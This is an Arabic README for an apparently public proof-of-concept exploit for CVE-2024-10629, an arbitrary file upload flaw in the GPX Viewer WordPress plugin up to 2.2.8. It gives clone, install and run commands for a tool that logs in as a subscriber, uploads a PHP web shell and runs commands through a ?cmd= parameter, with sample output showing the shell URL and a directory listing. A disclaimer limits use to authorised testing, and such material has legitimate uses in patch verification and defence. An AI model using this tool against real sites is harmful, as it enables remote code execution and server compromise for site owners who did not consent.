
GPX Viewer <= 2.2.8 - مستخدم مصادق عليه (Subscriber+) إنشاء ملف تعسفي
يحتوي هذا المستودع على إثبات مفهوم لاستغلال الثغرة في إضافة GPX Viewer لووردبريس، والتي تسمح بإنشاء ملفات عشوائية (CVE-2024-10629). تسمح الثغرة للمهاجمين الموثّقين بمستوى وصول المشتركين أو أعلى بإنشاء ملفات عشوائية على خادم الموقع المتأثر، مما قد يؤدي إلى تنفيذ أكواد عن بُعد.
إضافة GPX Viewer لووردبريس معرضة لثغرة إنشاء ملف عشوائي بسبب عدم وجود فحص للصلاحية والتحقق من نوع الملف في الدالة gpxv_file_upload() في جميع الإصدارات حتى 2.2.8. مما يسمح للمهاجمين الموثّقين بمستوى وصول المشتركين أو أعلى بإنشاء ملفات عشوائية على خادم الموقع المتأثر، مما قد يؤدي إلى تنفيذ أكواد عن بُعد.
requestsاستنساخ المستودع:
git clone https://github.com/Nxploited/CVE-2024-10629/
cd CVE-2024-10629
تثبيت المكتبة المطلوبة:
pip install requests
تشغيل الأداة:
python exploit.py -u <target_url> -un <username> -p <password>
استبدل <target_url> و<username> و<password> بالقيم المناسبة.
python CVE-2024-10629.py -u http://example.com/wordpress -un subscriber -p subscriber_password
ls).[+] WordPress plugin version: 2.2.8
[+] Vulnerable version detected. Proceeding with exploitation...
[+] Logged in successfully.
[+] Shell uploaded. Checking shell...
[+] Shell uploaded successfully.
[+] Shell URL: http://example.com/wp-content/uploads/gpx/uncategorized/nxploit_exploit.php
[+] Command output:
http://example.com/wp-content/uploads/gpx/uncategorized/nxploit_exploit.php?cmd=ls
index.php
wp-admin
wp-content
wp-includes
...
ls = عرض الملفاتuname -a = عرض معلومات النظامهذه الأداة مخصصة للأغراض التعليمية والاختبار المصرح به فقط. الاستخدام غير المصرح به لهذه الأداة ضد أنظمة لا تملكها أو ليس لديك إذن صريح باختبارها هو غير قانوني وغير أخلاقي. المؤلفون والمساهمون في هذا المستودع غير مسؤولين عن أي سوء استخدام أو ضرر ناتج عن هذه الأداة.
بواسطة: Khaled Alenazi (Nxploit)